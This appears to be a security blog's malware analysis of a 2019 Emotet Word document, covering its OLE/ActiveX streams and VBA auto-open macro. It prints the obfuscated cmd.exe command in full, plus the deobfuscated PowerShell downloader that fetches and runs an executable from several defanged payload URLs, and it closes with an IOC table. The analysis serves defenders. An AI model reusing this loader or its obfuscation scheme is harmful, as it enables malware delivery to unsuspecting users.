Malicious office documents are by far the most prevalent method of infiltrating malware into internal organization networks. Email-based attacks carry the malicious Office document which is opened by the end user, resulting in malicious code execution on the host in the context of the current user session.
Attackers hit all known sectors and organizations and it is seen that employees received on average 31 phishing per year until 2021.
Therefore, it is imperative that, whether be it an IT specialist, security professional, analyst, engineer and so forth, know how to address malicious documents and analyze them properly.
In this post, we will give an example of how to analyze Office Word documents, in this case, a Word document weaponized with a malicious OLE object that downloads an Emotet malware payload.
Below is the opened Word document with the "Enable Content" warning:
It is a known fact that regular non-technical users will click the button in most cases. Once clicked, malicious VBA (Visual Basic for Applications) code will be executed in the background, spawning a chain of malicious commands resulting in payload downloading and installation.
We will focus on the Word Document itself rather than the payload (the server from which the executable payload is fetched is offline nowadays, as the sample was first seen in 2019).
The Word document file format is OLE (Object Linking and Embedding) which is a very common object format in Microsoft Office used to add interaction and features to documents, allowing documents to embed objects and invoke their functionality at opening.
Please refer to the Microsoft reference on OLE background for a thorough explanation on the OLE background:
"OLE documents, historically called compound documents, seamlessly integrate various types of data, or components. Sound clips, spreadsheets, and bitmaps are typical examples of components found in OLE documents. Supporting OLE in your application allows your users to use OLE documents without worrying about switching between the different applications; OLE does the switching for you."
OLE files have their own magic bytes (binary signature): "0xD0CF11E0A1B11AE1"
Finding the Embedded OLE Object
When eye-balling the document, a tiny text box was spotted. It is there for a reason. The malicious document code is comprised of a combination of VBA macros and malicious ActiveX controls:
When zooming into the text box (the ActiveX control), the beginning f what seems to be a cmd.exe command pops out.
At this point we dig into the VBA project inside the document to get a better look of the code. As mentioned earlier, the malicious functionality is a combination of VBA code and an ActiveX control (in this case - a Text Box Form object). We will get to analyzing the VBA macros in later in this post.
Notice the location of the OLE object streams:
a.doc (the document) -> a (root OLE storage) -> ObjectPool (common storage name where embedded OLE objects are located) -> _1606938108:
Every stream has its own role in the play. In the next section we will elaborate on each stream and its contents, along with some important background on the embedded OLE object structure.
\001CompObj
The root stream of the OLE object containing general information on the object and its type:
\003ObjInfo
Stores what is referred to as the ODT structure.
The structure is built on 6 bytes (3 byte pairs), in little endian:
0x1200, 0x0003, 0x0004
Microsoft documentation on the ODT structure.
First two bytes: ODTPersist1 0x1200
When looking at the binary representation of the hex number 0x1200 (0000000001001000) 10110 we see that the "J" and "M" bits are set to 1. The "M" bit is more indicative as it indicates the object is an reusable software module, or in its more familiar name - an ActiveX control:
Second byte pair: cf 0x0003
cf value is 0x0003 indicates that the format of the embedded file is “Metafile” or “Enhanced Metafile”. To determine which one of those, we will need the ODTPersist2 structure.
Last two bytes - ODTPersist2 0x04 (binary: 0010)
A bit that specifies whether the application that saved this Word Binary file had queried this OLE object to determine whether it supported the Enhanced Metafile format:
\003OCXNAME
The name of the ActiveX control object - "TextBox1"
\003PRINT
This stream can be seen as the display image printed on the text box - "cmd /c %PrOG"
(The text box when enlarged, as seen earlier)
contents
The actual contents stored in the Text Box, in this case the malicious command itself.
In the contents, decimal content is stored and executed via cmd.exe. the decimal content is used to obfuscate the final command and will be deobfuscated upon execution. The decimal bytes will be piped ("|") to cmd.exe after some manipulation.
VBA Macros Analysis
The text box is located under the "Microsoft Word Objects" Storage.
The VBA execution flow is as follows:
Document is opened by the user.
"Enable Contents" button is clicked by the user causing Macros invocation.
Malicious ActiveX control is loaded by the Word document - the malicious embedded OLE file. the ActiveX control is a Textbox1 Form object that stores a malicious obfuscated command.
The text box object under the VBA macros project holds the "autoopen()" function. This is the entry point of the VBA code.
The "autoopen()" function executes another function named "s1045119()". This function is highly obfuscated. The only meaningful line of code is inside the "Shell()" built-in function, which executes the contents of the "contents" OLE stream:
h323333912 = Array(M0030391, i637107329, d58358, Interaction.Shell(("" + v5804520 + Q73263 + Z34707 + L69789720701213.TextBox1) + H92859 + z93782 + J597939 + V37335, 58 - 58), k36488, H400255, N44599)
Deobfuscation and Analysis of the Malicious Commands
The "contents" OLE stream stores the malicious command that is executed once the document is opened.
We addressed the deobfuscation part dynamically, letting the code do the Job for us with slight modifications to avoid execution of the Emotet payload.
Malicious shell command in the "contents" stream:
cmd /c %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% /V: /C "sET ZRX4=OUj=/a~',b1%-h.)CSlN dtY8PiR6oM4Arxwnuy\KfDX:J{mg}GEp$L+5Wk9IB2ce7F;3v0(Ts@&&FOR %n In ( 52 , 29 , 35, 11 ,25 , 1, 61 , 54 ,60 , 16 ,44 , 6,56, 8 ,10, 11 , 33, 11 , 17 ,51 ,17, 17 , 60 ,0 , 19 ,19 , 32 , 30 , 51 , 44, 6 , 12 , 31,8 ,10, 11, 13 , 11 , 72 , 51,30 , 25 , 44 , 6 , 12 , 68, 8 , 10 , 11, 18 , 18 ,20 , 53 , 26,28 , 24 , 70 ,3 , 7 ,35 , 31 ,65, 59 , 7 ,67 , 53 , 36 , 65 , 62, 70 , 3 ,36 , 64 ,35 , 12 , 29 , 9 ,2 ,64 , 63 , 22 , 20 , 19 , 64 , 22 , 14 , 57 , 64 , 9 ,16 , 18 , 26 , 64, 36 ,22,67 ,53 ,9 , 68 , 28 , 24 , 3, 7 , 13 , 22, 22 , 52 , 44 , 4 , 4, 2 , 29 , 13 , 36 , 36 , 38 ,63, 33 , 5 , 52 , 14 , 63, 29 , 47 , 4, 13 ,29 , 10 , 52 , 13 , 70 , 36 ,2 , 21,74 , 13 , 22 ,22 , 52 , 44 ,4, 4 , 58 , 26 , 21 , 73 , 12 ,64 , 21,37 , 63 , 5 , 22 , 26 , 29 , 36 ,12 , 73 , 37, 52 , 52 , 29 , 33 ,22 , 14 , 63, 29 , 47 , 4 ,54 ,27 ,18 , 10, 56,16, 23 , 74 , 13 , 22 , 22 , 52 ,44 , 4, 4 , 22 , 29, 33, 22 ,37 , 48 ,5, 21, 5, 22 , 5 ,63 , 29 , 33 , 52 , 14 , 63 , 29 ,47 , 4 , 40 ,68 , 23, 65 , 26 , 21 , 52 , 74 ,13 ,22, 22, 52 , 44 , 4 , 4 , 33 ,64,5, 18 , 26 ,22 ,38 , 63 , 29 , 47 , 52 , 37 , 22 , 64 ,33, 73 , 14, 36 , 18, 4 , 16 , 43 ,62 ,26 , 9 , 34, 27, 56 , 33 ,31, 74 , 13 , 22 , 22, 52 , 44, 4, 4 , 2 ,5 , 73 , 52 , 26 , 36 , 41 , 29 , 33 , 47 , 5 , 22 , 26 , 63,5 , 14 , 63 , 29, 47 , 4,73 , 21, 54 , 24 , 73 , 65 , 13 , 48, 7 ,14 , 17, 52 , 18 , 26, 22 , 71 , 7 , 74 , 7, 15 , 67 , 53 , 27 , 65 ,70 ,10 , 3 , 7 , 69 ,68 , 31, 65,7,67 , 53 , 18, 70 , 31 , 10, 20 , 3 , 20 , 7 , 68 , 65 ,10 , 7, 67 , 53 ,40 , 62, 70 , 28 , 3, 7 , 45 , 59,28 , 31 , 7 , 67 , 53 , 35 , 56, 62, 56 , 3,53,64 ,36, 69, 44 , 52 , 37 , 9 , 18 ,26 , 63 ,55 , 7 , 39 , 7 , 55 , 53, 18 , 70 , 31 ,10 , 55 , 7 , 14, 64, 34 , 64,7 , 67 ,41, 29 , 33 , 64 ,5 , 63, 13 , 71 , 53, 37 ,24 , 65 , 65 , 20 , 26 , 36 , 20 , 53 , 9 , 68 ,28 , 24 ,15 , 46, 22 , 33 , 38 , 46 , 53 , 36 , 65, 62, 70 ,14 , 42, 29 , 35 , 36 ,18 , 29, 5 , 21, 66 , 26, 18 , 64 , 71 , 53 , 37 , 24 , 65, 65 , 8 , 20, 53 , 35 , 56 , 62 , 56 , 15, 67 , 53 ,0 , 10 , 65 , 10, 3 , 7 , 21 , 28 , 70 , 68,7 , 67 , 60 , 41 ,20 , 71 , 71 , 50 , 64 ,22 , 12 ,60 , 22 , 64, 47 , 20 , 53 , 35 ,56 ,62 , 56,15 , 14 , 18 ,64 , 36 ,48 ,22 , 13 , 20 , 12 ,48 , 64 , 20 , 24 , 70 , 70 , 70, 70 , 15 , 20 , 46 ,60, 36 , 69, 29 , 58 ,64,12 , 60 , 22,64,47 , 20 , 53 , 35 , 56 , 62, 56, 67, 53 , 42,24 , 24, 28 , 3 ,7 ,63 , 62 ,62 , 68 ,7 , 67, 9,33 ,64 ,5, 58 , 67, 49 , 49 , 63 , 5 , 22,63 , 13 , 46 , 49 , 49 ,53 , 21, 65 ,65, 59 ,3, 7 , 1 ,24 , 31 , 59 , 7,67 ,80 )DO seT HS=!HS!!ZRX4:~ %n, 1!&if %n GEq 80 ECho !HS:~ 4! | CMD"
Defanged command:
(deducted the "| CMD" to avoid from piping the output to cmd.exe and execute it)
cmd /c %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% /V: /C "sET ZRX4=OUj=/a~',b1%-h.)CSlN dtY8PiR6oM4Arxwnuy\KfDX:J{mg}GEp$L+5Wk9IB2ce7F;3v0(Ts@&&FOR %n In ( 52 , 29 , 35, 11 ,25 , 1, 61 , 54 ,60 , 16 ,44 , 6,56, 8 ,10, 11 , 33, 11 , 17 ,51 ,17, 17 , 60 ,0 , 19 ,19 , 32 , 30 , 51 , 44, 6 , 12 , 31,8 ,10, 11, 13 , 11 , 72 , 51,30 , 25 , 44 , 6 , 12 , 68, 8 , 10 , 11, 18 , 18 ,20 , 53 , 26,28 , 24 , 70 ,3 , 7 ,35 , 31 ,65, 59 , 7 ,67 , 53 , 36 , 65 , 62, 70 , 3 ,36 , 64 ,35 , 12 , 29 , 9 ,2 ,64 , 63 , 22 , 20 , 19 , 64 , 22 , 14 , 57 , 64 , 9 ,16 , 18 , 26 , 64, 36 ,22,67 ,53 ,9 , 68 , 28 , 24 , 3, 7 , 13 , 22, 22 , 52 , 44 , 4 , 4, 2 , 29 , 13 , 36 , 36 , 38 ,63, 33 , 5 , 52 , 14 , 63, 29 , 47 , 4, 13 ,29 , 10 , 52 , 13 , 70 , 36 ,2 , 21,74 , 13 , 22 ,22 , 52 , 44 ,4, 4 , 58 , 26 , 21 , 73 , 12 ,64 , 21,37 , 63 , 5 , 22 , 26 , 29 , 36 ,12 , 73 , 37, 52 , 52 , 29 , 33 ,22 , 14 , 63, 29 , 47 , 4 ,54 ,27 ,18 , 10, 56,16, 23 , 74 , 13 , 22 , 22 , 52 ,44 , 4, 4 , 22 , 29, 33, 22 ,37 , 48 ,5, 21, 5, 22 , 5 ,63 , 29 , 33 , 52 , 14 , 63 , 29 ,47 , 4 , 40 ,68 , 23, 65 , 26 , 21 , 52 , 74 ,13 ,22, 22, 52 , 44 , 4 , 4 , 33 ,64,5, 18 , 26 ,22 ,38 , 63 , 29 , 47 , 52 , 37 , 22 , 64 ,33, 73 , 14, 36 , 18, 4 , 16 , 43 ,62 ,26 , 9 , 34, 27, 56 , 33 ,31, 74 , 13 , 22 , 22, 52 , 44, 4, 4 , 2 ,5 , 73 , 52 , 26 , 36 , 41 , 29 , 33 , 47 , 5 , 22 , 26 , 63,5 , 14 , 63 , 29, 47 , 4,73 , 21, 54 , 24 , 73 , 65 , 13 , 48, 7 ,14 , 17, 52 , 18 , 26, 22 , 71 , 7 , 74 , 7, 15 , 67 , 53 , 27 , 65 ,70 ,10 , 3 , 7 , 69 ,68 , 31, 65,7,67 , 53 , 18, 70 , 31 , 10, 20 , 3 , 20 , 7 , 68 , 65 ,10 , 7, 67 , 53 ,40 , 62, 70 , 28 , 3, 7 , 45 , 59,28 , 31 , 7 , 67 , 53 , 35 , 56, 62, 56 , 3,53,64 ,36, 69, 44 , 52 , 37 , 9 , 18 ,26 , 63 ,55 , 7 , 39 , 7 , 55 , 53, 18 , 70 , 31 ,10 , 55 , 7 , 14, 64, 34 , 64,7 , 67 ,41, 29 , 33 , 64 ,5 , 63, 13 , 71 , 53, 37 ,24 , 65 , 65 , 20 , 26 , 36 , 20 , 53 , 9 , 68 ,28 , 24 ,15 , 46, 22 , 33 , 38 , 46 , 53 , 36 , 65, 62, 70 ,14 , 42, 29 , 35 , 36 ,18 , 29, 5 , 21, 66 , 26, 18 , 64 , 71 , 53 , 37 , 24 , 65, 65 , 8 , 20, 53 , 35 , 56 , 62 , 56 , 15, 67 , 53 ,0 , 10 , 65 , 10, 3 , 7 , 21 , 28 , 70 , 68,7 , 67 , 60 , 41 ,20 , 71 , 71 , 50 , 64 ,22 , 12 ,60 , 22 , 64, 47 , 20 , 53 , 35 ,56 ,62 , 56,15 , 14 , 18 ,64 , 36 ,48 ,22 , 13 , 20 , 12 ,48 , 64 , 20 , 24 , 70 , 70 , 70, 70 , 15 , 20 , 46 ,60, 36 , 69, 29 , 58 ,64,12 , 60 , 22,64,47 , 20 , 53 , 35 , 56 , 62, 56, 67, 53 , 42,24 , 24, 28 , 3 ,7 ,63 , 62 ,62 , 68 ,7 , 67, 9,33 ,64 ,5, 58 , 67, 49 , 49 , 63 , 5 , 22,63 , 13 , 46 , 49 , 49 ,53 , 21, 65 ,65, 59 ,3, 7 , 1 ,24 , 31 , 59 , 7,67 ,80 )DO seT HS=!HS!!ZRX4:~ %n, 1!&if %n GEq 80 ECho !HS:~ 4!" > out.txtInstead of piping the command output to cmd.exe, it was written to a file (out.txt) to examine the deobfuscated command to be executed:
(beginning of out.txt contents)
Obfuscated command execution:
Output:
(output continuation)
The output is a follow-up downloader PowerShell command which downloads and saves the Emotet payload to "C:\Users\Public\371.exe"
PowerShell command:
PowerShell $i680='w479';$n720=new-object Net.WebClient;$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');$R701='v347';$l041 = '371';$K206='J964';$w525=$env:public+'\'+$l041+'.exe';for each($u877 in b368){try{$n720.DownloadFile($u877, $w525);$O171='d603';If ((Get-Item $w525).length -ge 80000) {Invoke-Item $w525;$D886='c223';break;}}catch{}}$d779='U849';Clean PowerShell code:
$n720=new-object Net.WebClient;
$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');
$l041 = '371';
$w525=$env:public+'\'+$l041+'.exe';
foreach($u877 in $b368){
try{
$n720.DownloadFile($u877, $w525);
If ((Get-Item $w525).length -ge 80000) {
Invoke-Item $w525;
break;
}
}catch{}
}Defanged command:
(only attempts to download the payload without execution)
$n720=new-object Net.WebClient;
$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');
$l041 = '371';
$w525=$env:public+'\'+$l041+'.exe';
foreach($u877 in $b368){
$n720.DownloadFile($u877, $w525);
}Execution of the defanged command was unsuccessful:
Due to the sample being relatively old (2019), the Emotet payload URLs are offline. This post was focused on the analysis of the Word document itself, the way it invokes a malicious shell command from the contents of an ActiveX control - an embedded OLE object.
We hope you enjoyed the content :)
Will meet in the next blog post on malicious Office documents analysis.
References:
Indicators of Compromise
Indicator | Description |
422d8a97b75426b9725b6a0f6a9ecb1818160dc931140b7615e38c5a62ecaad7 | Maldoc SHA-256 |
a.doc | Maldoc filename |
hxxp[:]//johnnycrap[.]com/ho1ph0njd | Emotet payload URL |
hxxp[:]//kids-education-support[.]com/LRl15CY | Emotet payload URL |
hxxp[:]//tortugadatacorp[.]com/K3Y7idp | Emotet payload URL |
hxxp[:]//realitycomputers[.]nl/CX2ibxR5r4 | Emotet payload URL |
hxxp[:]//jaspinformatica[.]com/sdL8s7hg | Emotet payload URL |